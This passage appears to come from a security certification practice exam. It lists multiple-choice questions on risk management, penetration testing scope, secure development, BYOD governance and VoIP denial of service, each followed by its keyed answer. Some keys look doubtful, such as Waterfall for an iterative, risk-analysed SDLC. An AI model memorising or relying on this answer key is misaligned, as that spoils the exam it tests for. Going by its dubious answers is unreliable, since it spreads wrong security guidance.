found to be vulnerable. The business recently funded a patch management product and SOE
hardening initiative. A third party auditor reported findings against the business because some
systems were missing patches. Which of the following statements BEST describes this situation?
A. The CFO is at fault because they are responsible for patching the systems and have already
been given patch management and SOE hardening products.
B. The audit findings are invalid because remedial steps have already been applied to patch
servers and the remediation takes time to complete.
C. The CISO has not selected the correct controls and the audit findings should be assigned to
them instead of the CFO.
D. Security controls are generally never 100% effective and gaps should be explained to
stakeholders and managed accordingly.
D. Security controls are generally never 100% effective and gaps should be explained to
stakeholders and managed accordingly.
The Information Security Officer (ISO) is reviewing a summary of the findings from the last COOP
tabletop exercise. The Chief Information Officer (CIO) wants to determine which additional controls
must be implemented to reduce the risk of an extended customer service outage due to the VoIP
system being unavailable. Which of the following BEST describes the scenario presented and the
document the ISO is reviewing?
A. The ISO is evaluating the business implications of a recent telephone system failure within the
BIA.
B. The ISO is investigating the impact of a possible downtime of the messaging system within the
RA.
C. The ISO is calculating the budget adjustment needed to ensure audio/video system redundancy
within the RFQ.
D. The ISO is assessing the effect of a simulated downtime involving the telecommunication
system within the AAR.
D. The ISO is assessing the effect of a simulated downtime involving the telecommunication
system within the AAR.
Which of the following activities is commonly deemed “OUT OF SCOPE” when undertaking a
penetration test?
A. Test password complexity of all login fields and input validation of form fields
B. Reverse engineering any thick client software that has been provided for the test
C. Undertaking network-based denial of service attacks in production environment
D. Attempting to perform blind SQL injection and reflected cross-site scripting attacks
E. Running a vulnerability scanning tool to assess network and host weaknesses
C. Undertaking network-based denial of service attacks in production environment
A company is in the process of implementing a new front end user interface for its customers, the
goal is to provide them with more self service functionality. The application has been written by
developers over the last six months and the project is currently in the test phase.
Which of the following security activities should be implemented as part of the SDL in order to
provide the MOST security coverage over the solution? (Select TWO).
A. Perform unit testing of the binary code
B. Perform code review over a sampling of the front end source code
C. Perform black box penetration testing over the solution
D. Perform grey box penetration testing over the solution
E. Perform static code review over the front end source code
D. Perform grey box penetration testing over the solution
E. Perform static code review over the front end source code
A new web based application has been developed and deployed in production. A security
engineer decides to use an HTTP interceptor for testing the application. Which of the following
problems would MOST likely be uncovered by this tool?
A. The tool could show that input validation was only enabled on the client side
B. The tool could enumerate backend SQL database table and column names
C. The tool could force HTTP methods such as DELETE that the server has denied
D. The tool could fuzz the application to determine where memory leaks occur
A. The tool could show that input validation was only enabled on the client side
A security consultant is conducting a network assessment and wishes to discover any legacy
backup Internet connections the network may have. Where would the consultant find this
information and why would it be valuable?
A. This information can be found in global routing tables, and is valuable because backup
connections typically do not have perimeter protection as strong as the primary connection.
B. This information can be found by calling the regional Internet registry, and is valuable because
backup connections typically do not require VPN access to the network.
C. This information can be found by accessing telecom billing records, and is valuable because
backup connections typically have much lower latency than primary connections.
D. This information can be found by querying the network’s DNS servers, and is valuable because
backup DNS servers typically allow recursive queries from Internet hosts.
A. This information can be found in global routing tables, and is valuable because backup
connections typically do not have perimeter protection as strong as the primary connection.
A network administrator with a company’s NSP has received a CERT alert for targeted adversarial
behavior at the company. In addition to the company’s physical security, which of the following can
the network administrator use to detect the presence of a malicious actor physically accessing the
company’s network or information systems from within? (Select TWO).
A. RAS B. Vulnerability scanner C. HTTP intercept D. HIDS E. Port scanner F. Protocol analyzer
D. HIDS
F. Protocol analyzer
The security engineer receives an incident ticket from the helpdesk stating that DNS lookup
requests are no longer working from the office. The network team has ensured that Layer 2 and
Layer 3 connectivity are working. Which of the following tools would a security engineer use to
make sure the DNS server is listening on port 53?
A. PING
B. NESSUS
C. NSLOOKUP
D. NMAP
D. NMAP
A human resources manager at a software development company has been tasked with recruiting
personnel for a new cyber defense division in the company. This division will require personnel to
have high technology skills and industry certifications. Which of the following is the BEST method
for this manager to gain insight into this industry to execute the task?
A. Interview candidates, attend training, and hire a staffing company that specializes in technology
jobs
B. Interview employees and managers to discover the industry hot topics and trends
C. Attend meetings with staff, internal training, and become certified in software management
D. Attend conferences, webinars, and training to remain current with the industry and job
requirements
D. Attend conferences, webinars, and training to remain current with the industry and job
requirements
The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day
exploits. The CISO is concerned that an unrecognized threat could compromise corporate data
and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with
split staff/guest wireless functionality. Which of the following equipment MUST be deployed to
guard against unknown threats?
A. Cloud-based antivirus solution, running as local admin, with push technology for definition
updates.
B. Implementation of an offsite data center hosting all company data, as well as deployment of
VDI for all client computing needs.
C. Host based heuristic IPS, segregated on a management VLAN, with direct control of the
perimeter firewall ACLs.
D. Behavior based IPS with a communication link to a cloud based vulnerability and threat feed.
D. Behavior based IPS with a communication link to a cloud based vulnerability and threat feed.
A small company’s Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to
improve the company’s security posture quickly with regard to targeted attacks. Which of the
following should the CSO conduct FIRST?
A. Survey threat feeds from services inside the same industry.
B. Purchase multiple threat feeds to ensure diversity and implement blocks for malicious traffic.
C. Conduct an internal audit against industry best practices to perform a qualitative analysis.
D. Deploy a UTM solution that receives frequent updates from a trusted industry vendor.
A. Survey threat feeds from services inside the same industry.
A security engineer is working on a large software development project. As part of the design of
the project, various stakeholder requirements were gathered and decomposed to an
implementable and testable level. Various security requirements were also documented. Organize
the following security requirements into the correct hierarchy required for an SRTM.
Requirement 1: The system shall provide confidentiality for data in transit and data at rest.
Requirement 2: The system shall use SSL, SSH, or SCP for all data transport.
Requirement 3: The system shall implement a file-level encryption scheme.
Requirement 4: The system shall provide integrity for all data at rest.
Requirement 5: The system shall perform CRC checks on all files.
A. Level 1: Requirements 1 and 4; Level 2: Requirements 2, 3, and 5
B. Level 1: Requirements 1 and 4; Level 2: Requirements 2 and 3 under 1, Requirement 5 under 4
C. Level 1: Requirements 1 and 4; Level 2: Requirement 2 under 1, Requirement 5 under 4; Level
3: Requirement 3 under 2
D. Level 1: Requirements 1, 2, and 3; Level 2: Requirements 4 and 5
B. Level 1: Requirements 1 and 4; Level 2: Requirements 2 and 3 under 1, Requirement 5 under 4
A mature organization with legacy information systems has incorporated numerous new processes
and dependencies to manage security as its networks and infrastructure are modernized. The
Chief Information Office has become increasingly frustrated with frequent releases, stating that the
organization needs everything to work completely, and the vendor should already have those
desires built into the software product. The vendor has been in constant communication with
personnel and groups within the organization to understand its business process and capture new
software requirements from users. Which of the following methods of software development is this
organization’s configuration management process using?
A. Agile
B. SDL
C. Waterfall
D. Joint application development
A. Agile
A security engineer is a new member to a configuration board at the request of management. The
company has two new major IT projects starting this year and wants to plan security into the
application deployment. The board is primarily concerned with the applications’ compliance with
federal assessment and authorization standards. The security engineer asks for a timeline to
determine when a security assessment of both applications should occur and does not attend
subsequent configuration board meetings. If the security engineer is only going to perform a
security assessment, which of the following steps in system authorization has the security
engineer omitted?
A. Establish the security control baseline
B. Build the application according to software development security standards
C. Review the results of user acceptance testing
D. Consult with the stakeholders to determine which standards can be omitted
A. Establish the security control baseline
An analyst connects to a company web conference hosted on
www.webconference.com/meetingID#01234 and observes that numerous guests have been
allowed to join, without providing identifying information. The topics covered during the web
conference are considered proprietary to the company. Which of the following security concerns
does the analyst present to management?
A. Guest users could present a risk to the integrity of the company’s information
B. Authenticated users could sponsor guest access that was previously approved by management
C. Unauthenticated users could present a risk to the confidentiality of the company’s information
D. Meeting owners could sponsor guest access if they have passed a background check
C. Unauthenticated users could present a risk to the confidentiality of the company’s information
During a recent audit of servers, a company discovered that a network administrator, who required
remote access, had deployed an unauthorized remote access application that communicated over
common ports already allowed through the firewall. A network scan showed that this remote
access application had already been installed on one third of the servers in the company. Which of
the following is the MOST appropriate action that the company should take to provide a more
appropriate solution?
A. Implement an IPS to block the application on the network
B. Implement the remote application out to the rest of the servers
C. Implement SSL VPN with SAML standards for federation
D. Implement an ACL on the firewall with NAT for remote access
C. Implement SSL VPN with SAML standards for federation
A small retail company recently deployed a new point of sale (POS) system to all 67 stores. The
core of the POS is an extranet site, accessible only from retail stores and the corporate office over
a split-tunnel VPN. An additional split-tunnel VPN provides bi-directional connectivity back to the
main office, which provides voice connectivity for store VoIP phones. Each store offers guest
wireless functionality, as well as employee wireless. Only the staff wireless network has access to
the POS VPN. Recently, stores are reporting poor response times when accessing the POS
application from store computers as well as degraded voice quality when making phone calls.
Upon investigation, it is determined that three store PCs are hosting malware, which is generating
excessive network traffic. After malware removal, the information security department is asked to
review the configuration and suggest changes to prevent this from happening again. Which of the
following denotes the BEST way to mitigate future malware risk?
A. Deploy new perimeter firewalls at all stores with UTM functionality.
B. Change antivirus vendors at the store and the corporate office.
C. Move to a VDI solution that runs offsite from the same data center that hosts the new POS
solution.
D. Deploy a proxy server with content filtering at the corporate office and route all traffic through it.
A. Deploy new perimeter firewalls at all stores with UTM functionality.
Executive management is asking for a new manufacturing control and workflow automation
solution. This application will facilitate management of proprietary information and closely guarded
corporate trade secrets.
The information security team has been a part of the department meetings and come away with
the following notes:
-Human resources would like complete access to employee data stored in the application. They
would like automated data interchange with the employee management application, a cloud-based
SaaS application.
-Sales is asking for easy order tracking to facilitate feedback to customers.
-Legal is asking for adequate safeguards to protect trade secrets. They are also concerned with
data ownership questions and legal jurisdiction.
-Manufacturing is asking for ease of use. Employees working the assembly line cannot be
bothered with additional steps or overhead. System interaction needs to be quick and easy.
-Quality assurance is concerned about managing the end product and tracking overall
performance of the product being produced. They would like read-only access to the entire
workflow process for monitoring and baselining.
The favored solution is a user friendly software application that would be hosted onsite. It has
extensive ACL functionality, but also has readily available APIs for extensibility. It supports readonly
access, kiosk automation, custom fields, and data encryption.
Which of the following departments’ request is in contrast to the favored solution?
A. Manufacturing
B. Legal
C. Sales
D. Quality assurance
E. Human resources
E. Human resources
The helpdesk manager wants to find a solution that will enable the helpdesk staff to better serve
company employees who call with computer-related problems. The helpdesk staff is currently
unable to perform effective troubleshooting and relies on callers to describe their technology
problems. Given that the helpdesk staff is located within the company headquarters and 90% of
the callers are telecommuters, which of the following tools should the helpdesk manager use to
make the staff more effective at troubleshooting while at the same time reducing company costs?
(Select TWO).
A. Web cameras
B. Email
C. Instant messaging
D. BYOD
E. Desktop sharing
F. Presence
C. Instant messaging
E. Desktop sharing
An intruder was recently discovered inside the data center, a highly sensitive area. To gain
access, the intruder circumvented numerous layers of physical and electronic security measures.
Company leadership has asked for a thorough review of physical security controls to prevent this
from happening again. Which of the following departments are the MOST heavily invested in
rectifying the problem? (Select THREE).
A. Facilities management
B. Human resources
C. Research and development
D. Programming
E. Data center operations
F. Marketing
G. Information technology
A. Facilities management
E. Data center operations
G. Information technology
A completely new class of web-based vulnerabilities has been discovered. Claims have been
made that all common web-based development frameworks are susceptible to attack. Proof-ofconcept
details have emerged on the Internet. A security advisor within a company has been
asked to provide recommendations on how to respond quickly to these vulnerabilities. Which of
the following BEST describes how the security advisor should respond?
A. Assess the reliability of the information source, likelihood of exploitability, and impact to hosted
data. Attempt to exploit via the proof-of-concept code. Consider remediation options.
B. Hire an independent security consulting agency to perform a penetration test of the web
servers. Advise management of any ‘high’ or ‘critical’ penetration test findings and put forward
recommendations for mitigation.
C. Review vulnerability write-ups posted on the Internet. Respond to management with a
recommendation to wait until the news has been independently verified by software vendors
providing the web application software.
D. Notify all customers about the threat to their hosted data. Bring the web servers down into
“maintenance mode” until the vulnerability can be reliably mitigated through a vendor patch.
A. Assess the reliability of the information source, likelihood of exploitability, and impact to hosted
data. Attempt to exploit via the proof-of-concept code. Consider remediation options.
A company sales manager received a memo from the company’s financial department which
stated that the company would not be putting its software products through the same security
testing as previous years to reduce the research and development cost by 20 percent for the
upcoming year. The memo also stated that the marketing material and service level agreement for
each product would remain unchanged. The sales manager has reviewed the sales goals for the
upcoming year and identified an increased target across the software products that will be affected
by the financial department’s change. All software products will continue to go through new
development in the coming year. Which of the following should the sales manager do to ensure
the company stays out of trouble?
A. Discuss the issue with the software product’s user groups
B. Consult the company’s legal department on practices and law
C. Contact senior finance management and provide background information
D. Seek industry outreach for software practices and law
B. Consult the company’s legal department on practices and law
A member of the software development team has requested advice from the security team to
implement a new secure lab for testing malware. Which of the following is the NEXT step that the
security team should take?
A. Purchase new hardware to keep the malware isolated.
B. Develop a policy to outline what will be required in the secure lab.
C. Construct a series of VMs to host the malware environment.
D. Create a proposal and present it to management for approval.
D. Create a proposal and present it to management for approval.
A company has issued a new mobile device policy permitting BYOD and company-issued devices.
The company-issued device has a managed middleware client that restricts the applications
allowed on company devices and provides those that are approved. The middleware client
provides configuration standardization for both company owned and BYOD to secure data and
communication to the device according to industry best practices. The policy states that, “BYOD
clients must meet the company’s infrastructure requirements to permit a connection.” The
company also issues a memorandum separate from the policy, which provides instructions for the
purchase, installation, and use of the middleware client on BYOD. Which of the following is being
described?
A. Asset management
B. IT governance
C. Change management
D. Transference of risk
B. IT governance
A security engineer on a large enterprise network needs to schedule maintenance within a fixed
window of time. A total outage period of four hours is permitted for servers. Workstations can
undergo maintenance from 8:00 pm to 6:00 am daily. Which of the following can specify
parameters for the maintenance work? (Select TWO).
A. Managed security service
B. Memorandum of understanding
C. Quality of service
D. Network service provider
E. Operating level agreement
B. Memorandum of understanding
E. Operating level agreement
An organization has decided to reduce labor costs by outsourcing back office processing of credit
applications to a provider located in another country. Data sovereignty and privacy concerns
raised by the security team resulted in the third-party provider only accessing and processing the
data via remote desktop sessions. To facilitate communications and improve productivity, staff at
the third party has been provided with corporate email accounts that are only accessible via the
remote desktop sessions. Email forwarding is blocked and staff at the third party can only
communicate with staff within the organization. Which of the following additional controls should
be implemented to prevent data loss? (Select THREE).
A. Implement hashing of data in transit
B. Session recording and capture
C. Disable cross session cut and paste
D. Monitor approved credit accounts
E. User access audit reviews
F. Source IP whitelisting
C. Disable cross session cut and paste
E. User access audit reviews
F. Source IP whitelisting
A company has received the contract to begin developing a new suite of software tools to replace
an aging collaboration solution. The original collaboration solution has been in place for nine
years, contains over a million lines of code, and took over two years to develop originally. The
SDLC has been broken up into eight primary stages, with each stage requiring an in-depth risk
analysis before moving on to the next phase. Which of the following software development
methods is MOST applicable?
A. Spiral model
B. Incremental model
C. Waterfall model
D. Agile model
C. Waterfall model
An attacker attempts to create a DoS event against the VoIP system of a company. The attacker
uses a tool to flood the network with a large number of SIP INVITE traffic. Which of the following
would be LEAST likely to thwart such an attack?
A. Install IDS/IPS systems on the network
B. Force all SIP communication to be encrypted
C. Create separate VLANs for voice and data traffic
D. Implement QoS parameters on the switches
Answer: D
D. Implement QoS parameters on the switches
